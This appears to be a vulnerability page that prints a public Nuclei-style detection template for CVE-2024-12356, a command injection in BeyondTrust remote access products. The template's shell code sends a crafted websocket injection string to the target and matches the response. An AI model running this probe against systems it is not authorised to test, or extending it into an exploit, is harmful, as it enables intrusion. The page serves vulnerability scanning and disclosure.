漏洞描述
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.
CVE-2024-12356: Privileged Remote Access & Remote Support - Command Injection
PoC代码[已公开]
id: CVE-2024-12356
info:
name: Privileged Remote Access & Remote Support - Command Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-12356
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-12356
cwe-id: CWE-77
epss-score: 0.93687
epss-percentile: 0.99842
cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
metadata:
vendor: beyondtrust
product: privileged_remote_access
verified: true
tags: cve,cve2024,beyondtrust,rce,remote-support,privileged-remote-access,kev,vkev
code:
- engine:
- sh
- bash
source: |
# brew install websocat
company=`curl -k -s "$Scheme://$Host/get_portal_info" | cut -d '=' -f2 | tail -n 1 | cut -d';' -f1`
echo -ne "1\n\n0\n\xC0';select 1 -- -\n" | websocat -k wss://$Host/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: $company" --binary -n --max-messages-rev 2
matchers:
- type: word
part: response
words:
- "0 success"
- "1 try again later"
# digest: 4b0a00483046022100ffd05598c4473e0d407ad41895742988fec529bc8bcf72bd9c00522c75f45590022100cdb9285becf169129ec66224b356c8da1dadc610e650bfb52d851d4dc5c25154:922c64590222798bb761d5b6d8e72950